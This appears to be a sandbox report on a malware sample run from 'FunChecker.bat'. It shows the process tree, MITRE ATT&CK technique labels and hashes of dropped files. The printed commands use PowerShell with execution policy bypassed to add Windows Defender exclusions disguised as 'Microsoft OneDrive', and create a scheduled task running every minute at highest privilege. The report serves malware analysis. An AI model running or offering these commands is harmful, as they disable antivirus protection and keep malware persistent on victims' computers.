C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'system32.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2908
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft OneDrive'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3996
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft OneDrive'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4944
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft OneDrive" /tr "C:\Users\Admin\AppData\Roaming\Microsoft OneDrive"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2716
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FunChecker.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:652 -
C:\Windows\SysWOW64\chcp.comchcp 650013⤵PID:496
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
1Disable or Modify Tools
1Modify Registry
3Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD51c19c16e21c97ed42d5beabc93391fc5
SHA18ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA2561bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
SHA5127d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c
-
Filesize
18KB
MD5c56b1bd9a1bf3b25bc74bade9af3e969
SHA1f646520f0e2012cf68503f7a3c6a2dc968b7e92c
SHA256f3c0972139750f69abb60fce015ef11725d227aeb1a91c981310ee4009f7def5
SHA51236604b04814bfc8120a7a1fdc6342aab87544525e44c9cf53ac84e68ee654c724413857d5111509f0dec619e673e0b155cc8e7cc113a4c8845ca9a8fa52d0b05
-
Filesize
18KB
MD59809c73926752a46c7dece5c80bdb643
SHA1de4c52439b69e515463d110a3f75fa637115cd7c
SHA256cacd6bcb2d96dc596e23f2873f24af4f7387214886d633c349be0a947e93f6d6
SHA51287a3b863678ac7b0e13530aaca5197fab9d0b4200bcfb137ebcfb67857d5619512b43ca53cf6f2c9f284fe102438f9e184635081af2b5e5b23ceae296c4786ff
-
Filesize
18KB
MD5ab1f4f052fb814675d3bce7d14eaff3a
SHA11fa3a0a7a475e34ba8eca7eedfdaf8af78a95374
SHA256d8a2ca6e3cccc1cb0cd2a9efec27b3fe6191a415707ddf7ab44399815e656050
SHA5126cc1d8a3251677308d48cba7be658a564c6443edeaa66534ce852f0fa1e1d3751963af31b6c32a7fceaeb45d7f89611078f0758c8ec39403a2522f1241f99ae8
-
Filesize
18KB
MD5649d838fc64c8dc6a49ae45c20f3d258
SHA15431bfdf464ded876a86807e306d5c3daa457e98
SHA25694592ed3d9cf577e882892b94399aa3b04b0174ef76f9faa3c4a62fe555afaa9
SHA5122951681789078da616908e152021a4a7215f586e58a67a72379f9f22cc8091ae13f07f7958b572d521b9af1d6e71cf53ef5647da9342e52b2a2b4f924793cce1
-
Filesize
18KB
MD53633b6611ddab582a906f1ad5d240d86
SHA14477610f3c1bb1f35372308d73b4d6eeaa892ec9
SHA2569aa8c5b143f7c3a180fd4dc0599bc51d97d596f573ba1c3275be7a15040dd9ed
SHA512114b46731df8a84030aaf3ca1c7b36812bdaf72a10b9569839efab8723baebc6f612d9f80fe441fcf4ed1bf12bab3ce07b3e26c29386457c7cf14e1384307a41
-
Filesize
18KB
MD520ea3dc66b82c3204e04a735c2e742ad
SHA11ea7d31f1d1e4a4cc7a31a2a198f979c995fdbc0
SHA256d4a18c6c4d08b8a63f6acaace1f64a5a5252b128284db3aaf6559086baf876da
SHA51291c31607b94af1c4be0f48e664a96003f5e8fa05842ef3f9d83d114f567367847f4d0affdd3f86e919747fc287dd0b66bcec8edf9c0597b447ee5814983caa5c
-
Filesize
15KB
MD56bfaf4d4fff7e439e4e34d04035274b7
SHA136e4be4257fde47c627108b17d4705535ec6340a
SHA25616b007690c7cc59d1f65df2753bc2299c2a4d315da2576e9e3b6835a1a32f867
SHA51218a7a6f82a659fbc481f835ba8e23fe87ec5f571c72efdfa97cdeaa6f06db2458832eb7e913787003458761741489d0aa793daa990601214fbe7f996d9667ff9
-
Filesize
18KB
MD528352882fd58e4d7917c7b6795d83473
SHA15a1b40bf649eb7c5b368bfed34b71c355619c593
SHA256262444c4f9bed09958e3ac582f3d46bf8215c94fc11014c3df939828722f4f1b
SHA51200355c4e47c867fcbdfb0868612bd14e052380e414496d87b07396b37f3a424efe51377ac5e85b38ab563c5ce5021dff3646e12a2ec6a649f6f3fc6f5632160d
-
Filesize
18KB
MD542257b947535cd5eb503b560693cab00
SHA1cb5ce5b7c5ffb23f8ec1165de04d1ad67e6098dc
SHA256f54d546c9542b820da4fc24b677997f86d5b19311a1aac56a5a4264f8e33ebe9
SHA51225927501c12bf6af18e7d28265c49120eda261bf2f26845f5ac1988c267c7e45198566c91b1fe12814c3071b9e3d616301fc05c9a5020538206e976575661c63
-
Filesize
18KB
MD50ad317ee151554ac790048134e6d1143
SHA13130dd19e2243467e098fd43604e1499f10f0550
SHA25629d2481ed0251b75b2a34eaea6db22b1824808819ca8c6207440d00db763ad3d
SHA51257f844b93ae17e690d53ff7bca85b70cf242be56c6cf98b1ff4ef191784ec64e35b66cc94dc90c86d087c916c87c862071e7f05fa6663f14dc973f61a812c9f2
-
Filesize
3KB
MD542afdea7c75bc9074a22ff1be2787959
SHA124bc20691a1e99e2cf0b2bca78694701fa47720a
SHA2563d005de7ab5cd8684deeb07dd7e280659384bc574ebe2293b470e29a092ecbc2
SHA512d30c5a89fa98534dc53f0e686db7a4eae66c891a4c06f585fcb35f3dcbad372365f175d2b7fa878875812dd9da097181784a35f8f615e8c05668d64a13863bb9
-
Filesize
3.4MB
MD58496d6a30ba3fdb1cd908cbcb41ef84e
SHA1986c94e5a502ef12b2cafab7cd21401436154e8f
SHA25665d35c5e52deb2c59470f099dfb44b05b2121e6f550a31727d3fee8f5be067cc
SHA512e28b7d3255f6639b6c1ef4ad6029ef64bcc6c0988e298465f9db2441aa30737b29bb6d3a0dc71f5e6f5835dd1553503e4b36b571c9ebfe28e4ea3398010f74d9
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
3KB
MD54c35b71d2d89c8e8eb773854085c56ea
SHA1ede16731e61348432c85ef13df4beb2be8096d9b
SHA2563efeeaaabfd33ff95934bee4d6d84e4ecb158d1e7777f6eecd26b2746991ed42
SHA512a6ccbb2913738ca171686a2dd70e96330b0972dadb64f7294ac2b4c9bb430c872ed2bcd360f778962162b9e3be305836fa7f6762b46310c0ad4d6ef0c1cdac8d
-
Filesize
3.6MB
MD5c2f9feba8f68d6772ba7fc1536603a33
SHA1e17c6f4fc8dcad67d0449c1f2f7d0863345d72c1
SHA256005efd0dcf8e4b4726d5717f9a1dedf4977d1477fd92b4490a1f851c8ed5d59a
SHA5128fa32ba1b80d94fcc28586cda1297dac4e444a0f20071bebc2644d3024551d2556f22bd549ca3f50f557a775a170df337953cc861be62f0ef248561c1615e968
-
Filesize
3.3MB
MD5b68dca29d73214a87ec703b788b456fd
SHA152cf9419bdaea5b1e1055186e4ea024fd1ee979e
SHA256049d8e8426b4ce065699759382d7d5d5a245f12d05bc6a0324a94426ec891d15
SHA512ec596f32f1bdee1221281aaa12139c35ef78ed9bc679a4b4c5c44a7a1ecf460d42516ea603c5aacc5b35499399205197d45c0bc1c6cd213c95cdcc54b918196b
-
Filesize
170B
MD53880a847b166ca071c8fca61111b6ad4
SHA1eff202011e22774a20a3dfacbaeac6780d34b0cb
SHA2566e0780f85c7208edfe441bc6fbedb80853c705446c7b6855d38d9b67466f80e5
SHA512234d3a50b582cc9aecf627902d394631045cf5e7d77c4212655763e239205f7322cc051b63f02babce153b8f579ae5421986106271ce3e307e5429a5bd25dc6b